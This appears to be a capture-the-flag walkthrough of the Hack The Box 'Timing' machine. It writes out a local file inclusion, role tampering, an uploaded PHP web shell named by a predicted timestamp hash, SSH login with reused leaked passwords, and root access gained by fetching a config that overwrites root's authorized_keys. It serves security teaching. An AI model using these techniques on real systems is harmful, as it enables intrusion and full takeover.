gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
mysql:x:111:114:MySQL Server,,,:/nonexistent:/bin/false
aaron:x:1000:1000:aaron:/home/aaron:/bin/bash

We can directly decode it and grep for user details. We got ‘aaron’ user. Now we can read files local files which we found in our initial directory brute force.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=upload.php' | base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  1360  100  1360    0     0   1730      0 --:--:-- --:--:-- --:--:--  1728
<?php
include("admin_auth_check.php");

$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

if (empty($error)) {
    if (move_uploaded_file($_FILES["fileToUpload"]["tmp_name"], $target_file)) {
        echo "The file has been uploaded.";
    } else {
        echo "Error: There was an error uploading your file.";
    }
} else {
    echo "Error: " . $error;
}
?>

‘Upload.php’ gives us another piece of information. But it only works if we have access to upload functionality. There’s Authentication check file, let’s look into it first.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=php://filter/convert.base64-encode/resource=admin_auth_check.php' | base64 -d
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   268  100   268    0     0    379      0 --:--:-- --:--:-- --:--:--   379
<?php

include_once "auth_check.php";

if (!isset($_SESSION['role']) || $_SESSION['role'] != 1) {
    echo "No permission to access this panel!";
    header('Location: ./index.php');
    die();
}

?>

To access upload feature the user should have a ‘role 1’, if not, this feature is not available. Now we need to find a way to login. There are no any files which has login details. However, if we login using previously found user ‘aaron’ as username and password, then it’d give you dashboard.

It say’s logged in as user 2.

The only way to edit the role is when we update user profile. Let’s edit the profile and intercept the update request in burp.

No need to change anything from the above input, as it only concerns about role ID.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
POST /profile_update.php HTTP/1.1
Host: timing.htb
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0
Accept: */*
Accept-Language: zh-CN,en-US;q=0.7,en;q=0.3
Accept-Encoding: gzip, deflate
Content-type: application/x-www-form-urlencoded
Content-Length: 53
Origin: http://timing.htb
Connection: close
Referer: http://timing.htb/profile.php
Cookie: PHPSESSID=fo9jpkl47lftjuf6pghqqgtqja

firstName=aaron&lastName=test&email=test&company=test&role=1

Add the role to data and forward the request and refresh the page. You will see ‘admin panel’

Admin panel has upload image feature.

Now it’s time to look into ‘upload.php’ code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
$upload_dir = "images/uploads/";

if (!file_exists($upload_dir)) {
    mkdir($upload_dir, 0777, true);
}

$file_hash = uniqid();

$file_name = md5('$file_hash' . time()) . '_' . basename($_FILES["fileToUpload"]["name"]);
$target_file = $upload_dir . $file_name;
$error = "";
$imageFileType = strtolower(pathinfo($target_file, PATHINFO_EXTENSION));

if (isset($_POST["submit"])) {
    $check = getimagesize($_FILES["fileToUpload"]["tmp_name"]);
    if ($check === false) {
        $error = "Invalid file";
    }
}

// Check if file already exists
if (file_exists($target_file)) {
    $error = "Sorry, file already exists.";
}

if ($imageFileType != "jpg") {
    $error = "This extension is not allowed.";
}

Above code is what we will look into. Uploaded files will be moved to ‘/images/uploads/‘ directory. File Extension must have ‘jpg’, and upon upload the filename will be changed to MD5 sum. The logic behind creating this MD5 sum is, it takes two things as input, ‘$file_hash’ and ‘time())’ and then adds the base filename of uploaded file to that hash.

According to PHP, uniqid() function generates a unique ID based on the microtime (the current time in microseconds). In PHP single quote (‘) and double quote(“) have different meanings and interpretations.

Single quoted strings will display things almost completely “as is.”. Double quote strings will display a host of escaped characters (including some regexes), and variables in the strings will be evaluated.

So, uniqid() is just a rabbit hole, it is taking $file_hash as string to generate MD5 hash. However, time()) is also being used as factor to generate MD5. It is considering current time in seconds, that means every second will get a new hash. We need to match the upload time to get the right hash. For that we need to make sure our local machine time is not far behind or a head.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nmap -p 80 --script http-date -v timing.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 09:43 EST
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 09:43
Completed NSE at 09:43, 0.00s elapsed
Initiating Ping Scan at 09:43
Scanning timing.htb (10.10.11.135) [4 ports]
Completed Ping Scan at 09:43, 0.39s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 09:43
Scanning timing.htb (10.10.11.135) [1 port]
Discovered open port 80/tcp on 10.10.11.135
Completed SYN Stealth Scan at 09:43, 0.39s elapsed (1 total ports)
NSE: Script scanning 10.10.11.135.
Initiating NSE at 09:43
Completed NSE at 09:43, 2.08s elapsed
Nmap scan report for timing.htb (10.10.11.135)
Host is up (0.35s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-date: Sat, 18 Dec 2021 14:43:51 GMT; +1s from local time.

NSE: Script Post-scanning.
Initiating NSE at 09:43
Completed NSE at 09:43, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.23 seconds
           Raw packets sent: 5 (196B) | Rcvd: 4 (588B)
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# date                                                                                                             
2021年 12月 18日 星期六 09:43:52 EST

You can check the date and match it with your time using nmap. Target is ‘-16’ seconds behind from my local time. You just need to confirm time, make sure to set your time to GMT.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# timedatectl set-timezone GMT
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nmap -p 80 --script http-date -v timing.htb
Starting Nmap 7.92 ( https://nmap.org ) at 2021-12-18 14:47 GMT
NSE: Loaded 1 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Initiating Ping Scan at 14:47
Scanning timing.htb (10.10.11.135) [4 ports]
Completed Ping Scan at 14:47, 0.44s elapsed (1 total hosts)
Initiating SYN Stealth Scan at 14:47
Scanning timing.htb (10.10.11.135) [1 port]
Discovered open port 80/tcp on 10.10.11.135
Completed SYN Stealth Scan at 14:47, 0.45s elapsed (1 total ports)
NSE: Script scanning 10.10.11.135.
Initiating NSE at 14:47
Completed NSE at 14:47, 2.61s elapsed
Nmap scan report for timing.htb (10.10.11.135)
Host is up (0.39s latency).

PORT   STATE SERVICE
80/tcp open  http
|_http-date: Sat, 18 Dec 2021 14:47:40 GMT; 0s from local time.

NSE: Script Post-scanning.
Initiating NSE at 14:47
Completed NSE at 14:47, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
Nmap done: 1 IP address (1 host up) scanned in 3.79 seconds
           Raw packets sent: 5 (196B) | Rcvd: 2 (84B)
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# date
2021年 12月 18日 星期六 14:47:44 GMT
1
2
3
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat demo.jpg
<?php system($_GET[cmd]);?>

Create a jpg file with PHP code which can give code execution access. Now we need to start a PHP interactive shell, where we run continuously run PHP code to generate hash based on time and string.

1
2
3
4
5
6
7
8
9
10
11
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# php -a
Interactive mode enabled

php > while (true){echo date("D M j G:i:s T Y"); echo " = " ; echo md5('$file_hash' . time());echo "\n";sleep(1);}
Sat Dec 18 14:53:10 UTC 2021 = 1a733cff506cb1313d5f1f495ab8296c
Sat Dec 18 14:53:11 UTC 2021 = 3dede351b682585854ab39ca71b4dfc3
Sat Dec 18 14:53:12 UTC 2021 = 40ecf3c85f74f6aba4c8cb13450e6327
Sat Dec 18 14:53:13 UTC 2021 = 9fb581a1b355eff367ab44f9855a1b66
Sat Dec 18 14:53:14 UTC 2021 = a6bd2452092174471a920790925c0b2c
......

Keep it going, do not terminate it. Now we need to upload that recently created jpg file, intercept the upload request, send it to repeater, check the response time and match the time with PHP hash.

1
2
3
4
5
6
7
8
9
10
11
HTTP/1.1 200 OK
Date: Sat, 18 Dec 2021 15:26:25 GMT
Server: Apache/2.4.29 (Ubuntu)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate
Pragma: no-cache
Content-Length: 27
Connection: close
Content-Type: text/html; charset=UTF-8

The file has been uploaded.

Check burp response time and find the matching hash of that time from PHP interactive session.

1
2
3
4
5
6
7
8
9
10
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# php -a                                                                                                           
Interactive mode enabled

php > while (true){echo date("D M j G:i:s T Y"); echo " = " ; echo md5('$file_hash' . time());echo "\n";sleep(1);}
Sat Dec 18 15:26:22 UTC 2021 = 12b8b15cb7d8c2478917de1bd09d0b90
Sat Dec 18 15:26:23 UTC 2021 = 5c472b960701353862e6667809ad9cc5
Sat Dec 18 15:26:24 UTC 2021 = 2faeeb4ca04516e9cf6bb199c9c5c9db
Sat Dec 18 15:26:25 UTC 2021 = a2f22cd589ca87a005c5f56a96a4189e
......

Response time is 15:26:25 Copy the hash, add the base filename of uploaded jpg file and access it via img query parameter.

Initial Access

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/a2f22cd589ca87a005c5f56a96a4189e_demo.jpg&cmd=id'
uid=33(www-data) gid=33(www-data) groups=33(www-data)

As you can see we have a code execution. This machine will not easily provide you reverse shell, as firewall (iptables) are in place to block outgoing request from a www-data user.

1
2
3
4
5
6
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/a2f22cd589ca87a005c5f56a96a4189e_demo.jpg&cmd=ls+-la+/opt'
total 624
drwxr-xr-x  2 root root   4096 Dec  2 11:19 .
drwxr-xr-x 24 root root   4096 Nov 29 01:34 ..
-rw-r--r--  1 root root 627851 Jul 20 22:36 source-files-backup.zip

‘/opt’ directory has a backup of website. Let’s download it first.

1
2
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/a2f22cd589ca87a005c5f56a96a4189e_demo.jpg&cmd=cp+/opt/source-files-backup.zip+/var/www/html/images/uploads/'

We can’t directory access the zip file, so copy it to uploads Directory and from there we can download it.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# curl 'http://timing.htb/image.php?img=images/uploads/source-files-backup.zip' --output source-files-backup.zip
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100  613k    0  613k    0     0  12744      0 --:--:--  0:00:49 --:--:-- 16798
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ls -la
总用量 628
drwxr-xr-x   2 root root   4096 12月 18 15:36 .
drwxr-xr-x 228 root root   4096 12月 18 08:33 ..
-rw-r--r--   1 root root     27 12月 18 14:50 demo.jpg
-rw-r--r--   1 root root 627851 12月 18 15:37 source-files-backup.zip

Extract or unzip the file and you will .git repository.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
┌──(root💀kali)-[~/hackthebox/machine/timing/backup]
└─# ls -la
总用量 76
drwxr-xr-x 6 root root 4096  7月 20 22:34 .
drwxr-xr-x 3 root root 4096 12月 18 15:42 ..
-rw-r--r-- 1 root root  200  7月 20 22:34 admin_auth_check.php
-rw-r--r-- 1 root root  373  7月 20 22:34 auth_check.php
-rw-r--r-- 1 root root 1268  7月 20 22:34 avatar_uploader.php
drwxr-xr-x 2 root root 4096  7月 20 22:34 css
-rw-r--r-- 1 root root   92  7月 20 22:34 db_conn.php
-rw-r--r-- 1 root root 3937  7月 20 22:34 footer.php
drwxr-xr-x 8 root root 4096  7月 20 22:35 .git
-rw-r--r-- 1 root root 1498  7月 20 22:34 header.php
-rw-r--r-- 1 root root  507  7月 20 22:34 image.php
drwxr-xr-x 3 root root 4096  7月 20 22:34 images
-rw-r--r-- 1 root root  188  7月 20 22:34 index.php
drwxr-xr-x 2 root root 4096  7月 20 22:34 js
-rw-r--r-- 1 root root 2074  7月 20 22:34 login.php
-rw-r--r-- 1 root root  113  7月 20 22:34 logout.php
-rw-r--r-- 1 root root 3041  7月 20 22:34 profile.php
-rw-r--r-- 1 root root 1740  7月 20 22:34 profile_update.php
-rw-r--r-- 1 root root  984  7月 20 22:34 upload.php

Let’s git commits using gittools.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
┌──(root💀kali)-[~/hackthebox/machine/timing/backup]
└─# /root/GitTools-master/Extractor/extractor.sh . source
###########
# Extractor is part of https://github.com/internetwache/GitTools
#
# Developed and maintained by @gehaxelt from @internetwache
#
# Use at your own risk. Usage might be illegal in certain circumstances. 
# Only for educational purposes!
###########
[*] Destination folder does not exist
[*] Creating...
[+] Found commit: 16de2698b5b122c93461298eab730d00273bd83e
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/admin_auth_check.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/auth_check.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/avatar_uploader.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/css
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/css/bootstrap.min.css
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/css/login.css
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/db_conn.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/footer.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/header.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/image.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/images
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/images/background.jpg                                                                                                            
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/images/user-icon.png                                                                                                             
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/index.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/avatar_uploader.js                                                                                                            
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/bootstrap.min.js                                                                                                              
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/jquery.min.js                                                                                                                 
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/js/profile.js                                                                                                                    
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/login.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/logout.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/profile.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/profile_update.php                                                                                                               
[+] Found file: /root/hackthebox/machine/timing/backup/source/0-16de2698b5b122c93461298eab730d00273bd83e/upload.php
[+] Found commit: e4e214696159a25c69812571c8214d2bf8736a3f
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/admin_auth_check.php                                                                                                             
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/auth_check.php                                                                                                                   
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/avatar_uploader.php                                                                                                              
[+] Found folder: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/css
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/css/bootstrap.min.css                                                                                                            
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/css/login.css                                                                                                                    
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/db_conn.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/footer.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/header.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/image.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/images
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/images/background.jpg                                                                                                            
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/images/user-icon.png                                                                                                             
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/index.php
[+] Found folder: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/avatar_uploader.js                                                                                                            
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/bootstrap.min.js                                                                                                              
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/jquery.min.js                                                                                                                 
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/js/profile.js                                                                                                                    
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/login.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/logout.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/profile.php
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/profile_update.php                                                                                                               
[+] Found file: /root/hackthebox/machine/timing/backup/source/1-e4e214696159a25c69812571c8214d2bf8736a3f/upload.php

After commit extraction, you will see two directories. Now we need to find what has changed in terms of code.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
┌──(root💀kali)-[~/hackthebox/machine/timing/backup/source]
└─# ls
0-16de2698b5b122c93461298eab730d00273bd83e  1-e4e214696159a25c69812571c8214d2bf8736a3f
┌──(root💀kali)-[~/hackthebox/machine/timing/backup/source]
└─# diff 0-16de2698b5b122c93461298eab730d00273bd83e/ 1-e4e214696159a25c69812571c8214d2bf8736a3f/
diff '--color=auto' 0-16de2698b5b122c93461298eab730d00273bd83e/commit-meta.txt 1-e4e214696159a25c69812571c8214d2bf8736a3f/commit-meta.txt
1,4c1,3
< tree dcbc181650833009145874df7da85b4c6d84b2ca
< parent e4e214696159a25c69812571c8214d2bf8736a3f
< author grumpy <grumpy@localhost.com> 1626820453 +0000
< committer grumpy <grumpy@localhost.com> 1626820453 +0000
---
> tree fd7fb62599f9702baeb0abdc42a8a4b68e49ec23
> author grumpy <grumpy@localhost.com> 1626820434 +0000
> committer grumpy <grumpy@localhost.com> 1626820434 +0000
6c5
< db_conn updated
---
> init
0-16de2698b5b122c93461298eab730d00273bd83e/css 和 1-e4e214696159a25c69812571c8214d2bf8736a3f/css 有共同的子目录
diff '--color=auto' 0-16de2698b5b122c93461298eab730d00273bd83e/db_conn.php 1-e4e214696159a25c69812571c8214d2bf8736a3f/db_conn.php
2c2
< $pdo = new PDO('mysql:host=localhost;dbname=app', 'root', '4_V3Ry_l0000n9_p422w0rd');
---
> $pdo = new PDO('mysql:host=localhost;dbname=app', 'root', 'S3cr3t_unGu3ss4bl3_p422w0Rd');
0-16de2698b5b122c93461298eab730d00273bd83e/images 和 1-e4e214696159a25c69812571c8214d2bf8736a3f/images 有共同的子目录
0-16de2698b5b122c93461298eab730d00273bd83e/js 和 1-e4e214696159a25c69812571c8214d2bf8736a3f/js 有共同的子目录

Database connection credentials has been modified. Let’s try these creds on user SSH login.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# ssh aaron@10.10.11.135
The authenticity of host '10.10.11.135 (10.10.11.135)' can't be established.
ED25519 key fingerprint is SHA256:l+I6D4WoPXSUZt7KMuKochzDuE9R21TrDSgg9nJcD5I.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.11.135' (ED25519) to the list of known hosts.
aaron@10.10.11.135's password: 
Welcome to Ubuntu 18.04.6 LTS (GNU/Linux 4.15.0-147-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec 18 15:47:36 UTC 2021

  System load:  0.0               Processes:           172
  Usage of /:   89.8% of 4.85GB   Users logged in:     0
  Memory usage: 47%               IP address for eth0: 10.10.11.135
  Swap usage:   0%

  => / is using 89.8% of 4.85GB


8 updates can be applied immediately.
8 of these updates are standard security updates.
To see these additional updates run: apt list --upgradable


aaron@timing:~$ id
uid=1000(aaron) gid=1000(aaron) groups=1000(aaron)
aaron@timing:~$ whoami
aaron
aaron@timing:~$ cat user.txt 
52202751554f6dc8c14dc2a637fca55a

The second password is being reused as ‘aaron’ user’s password.

Privilege Escalation - root

1
2
3
4
5
6
aaron@timing:~$ sudo -l
Matching Defaults entries for aaron on timing:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User aaron may run the following commands on timing:
    (ALL) NOPASSWD: /usr/bin/netutils

User can run a binary with root privileges. Let’s look into it.

1
2
3
4
5
aaron@timing:~$ file /usr/bin/netutils
/usr/bin/netutils: Bourne-Again shell script, ASCII text executable
aaron@timing:~$ cat /usr/bin/netutils
#! /bin/bash
java -jar /root/netutils.jar

It is a shell script, running a java application from root’s directory. Let’s interact with it.

1
2
3
4
5
6
7
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >>

Upon execution of the binary, it gives us two options, FTP and HTTP. Setup a HTTP server on Kali and download test file.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: 10.10.14.30/test.txt
Initializing download: http://10.10.14.30/test.txt
File size: 5 bytes
Opening output file test.txt
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 5 byte in 0 seconds. (0.01 KB/s)

After download check the downloaded file in ‘aaron’ user’s home directory or current working directory.

1
2
aaron@timing:~$ ls -la test.txt 
-rw-r--r-- 1 root root 5 Dec 18 15:54 test.txt

As you can see the file permissions are of root user and ‘aaron’ user has read access to it. We still don’t know what’s happening behind scene. Let’s run a pspy in one SSH terminal and in another execute sudo binary to find what’s happening.

1
2
2021/12/15 10:28:04 CMD: UID=0 PID=74557 | wget -r ftp://10.10.14.30
2021/12/15 10:28:30 CMD: UID=0 PID=74623 | /root/axel http://10.10.14.30

These two applications are being used behind the scene to download files. FTP is using wget and HTTP is using Axel application. We can get the ‘Axel’ application version via netcat.

1
2
3
4
5
6
7
8
9
10
11
12
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# nc -lvnp 80
Ncat: Version 7.92 ( https://nmap.org/ncat )
Ncat: Listening on :::80
Ncat: Listening on 0.0.0.0:80
Ncat: Connection from 10.10.11.135.
Ncat: Connection from 10.10.11.135:47068.
GET /test.txt HTTP/1.0
Host: 10.10.14.30
Accept: */*
Range: bytes=1-
User-Agent: Axel/2.16.1 (Linux)

The user agent disclose application version. This version has no any CVEs. ‘Axel’ application has a configuration file via that we can dump our SSH public keys as authorized_keys.

1
2
3
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# locate axel
/usr/share/doc/axel/examples/axelrc.example

If you are on kali, you will find example axelrc file.

1
2
3
4
5
6
7
8
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat /usr/share/doc/axel/examples/axelrc.example
......
# When downloading a HTTP directory/index page, (like http://localhost/~me/)
# what local filename do we have to store it in?
#
# default_filename = default
......

This ‘default_filename’ will be activated when downloading something without any filename from ‘axel’.

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
aaron@timing:~$ sudo /usr/bin/netutils
netutils v0.1
Select one option:
[0] FTP
[1] HTTP
[2] Quit
Input >> 1
Enter Url: http://10.10.14.30/
Initializing download: http://10.10.14.30/
File size: 382 bytes
Opening output file default
Server unsupported, starting from scratch with one connection.
Starting download


Downloaded 382 byte in 0 seconds. (0.41 KB/s)

As you can see from the above example, to download I didn’t provide any file name. Even thou it dowloaded something and saved it as ‘default’

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
aaron@timing:~$ ls -la default 
-rw-r--r-- 1 root root 382 Dec 18 16:08 default
aaron@timing:~$ cat default
<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html>
<title>Directory listing for /</title>
<body>
<h2>Directory listing for /</h2>
<hr>
<ul>
<li><a href="axelrc">axelrc</a>
<li><a href="backup/">backup/</a>
<li><a href="demo.jpg">demo.jpg</a>
<li><a href="source-files-backup.zip">source-files-backup.zip</a>
<li><a href="test.txt">test.txt</a>
</ul>
<hr>
</body>
</html>

If we read the ‘default’ file, then we will see HTML format of directory listing page.It just download the whole page and saved it as ‘default’. If we look closely, all the downloaded files have root’s permissions. We can use it our advantage.

1
2
3
4
5
6
7
cat axelrc
---------SNIP---------
# When downloading a HTTP directory/index page, (like http://localhost/~me/)
# what local filename do we have to store it in?
#
default_filename = /root/.ssh/authorized_keys
---------SNIP---------

Change the ‘default_filename’ to ‘/root/.ssh/authorized_keys’, save it. Download this file to ‘aaron’ user’s home directory and save it as .axelrc.

If we download something without providing file name then it will be dumped into ‘root’ directory. So we will dump our Kali SSH public key and save it as ‘authorized_keys’. But as we saw previously, it saves it in HTML format. For that we need to create new directory and save your Kali public key as index.html

1
2
3
4
5
6
7
8
9
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cp /root/.ssh/id_rsa .
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cp /root/.ssh/id_rsa.pub index.html
┌──(root💀kali)-[~/hackthebox/machine/timing]
└─# cat index.html                                                                                                   
